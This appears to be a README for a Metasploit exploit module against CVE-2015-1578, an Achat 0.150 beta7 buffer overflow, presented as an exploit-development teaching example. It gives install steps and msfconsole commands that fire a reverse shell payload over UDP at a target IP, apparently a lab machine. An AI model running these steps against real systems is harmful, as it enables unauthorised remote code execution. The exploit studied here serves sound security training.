This is a proof-of-concept Metasploit module exploit for CVE-2015-1578, a buffer overflow vulnerability in Achat 0.150 beta7 on Windows. Exploitation leads to remote code execution via a crafted UDP packet.# CVE-2015-1578 Metasploit Module
## Overview
This is a Metasploit module for **CVE-2015-1578**, a buffer overflow vulnerability in **Achat 0.150 beta7** on Windows. Exploitation leads to remote code execution via a crafted UDP packet.
## Purpose
This module is designed to serve as a clean, minimal, and well-structured example of Metasploit exploit development. It demonstrates:
- Dynamic Unicode-encoded shellcode generation via `msfvenom`
- Manual payload injection (bypassing Metasploit's internal payload encoder)
- Simple UDP-based delivery mechanism
- Integration into the Metasploit Framework using custom module loading
## Video Tutorial
[](https://youtu.be/f3Bn3VAzc3g)
## Dependencies
- Metasploit Framework
- `msfvenom` in your `$PATH`
## Features
- Uses `msfvenom` to generate payload with `x86/unicode_mixed` encoding and custom bad characters
- Avoids Metasploit’s built-in payload encoding system to work around encoder limitations
## Installation
```bash
./install.sh
```
Then launch Metasploit and run:
```
reload_all
use exploit/windows/yaldobaoth/achat_bof
```
Options
- `RHOSTS` – Target IP address (required)
- `LHOST` – Local host IP for reverse shell (required)
- `LPORT` – Local port for reverse shell (default: 4444)
- `RPORT` – Remote UDP port on target (default: 9256)
Usage Example
```
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
```
This will:
- Generate a Unicode-compatible reverse shell payload with msfvenom
- Inject it into the vulnerable Achat buffer over UDP
- Listen for the shell on the specified `LHOST:LPORT`
[4.0K] /data/pocs/89906cddd2c852c4118e2d24ba9c21f7806890ab
├── [4.7K] achat_bof.rb
├── [ 295] install.sh
└── [1.7K] README.md
0 directories, 3 files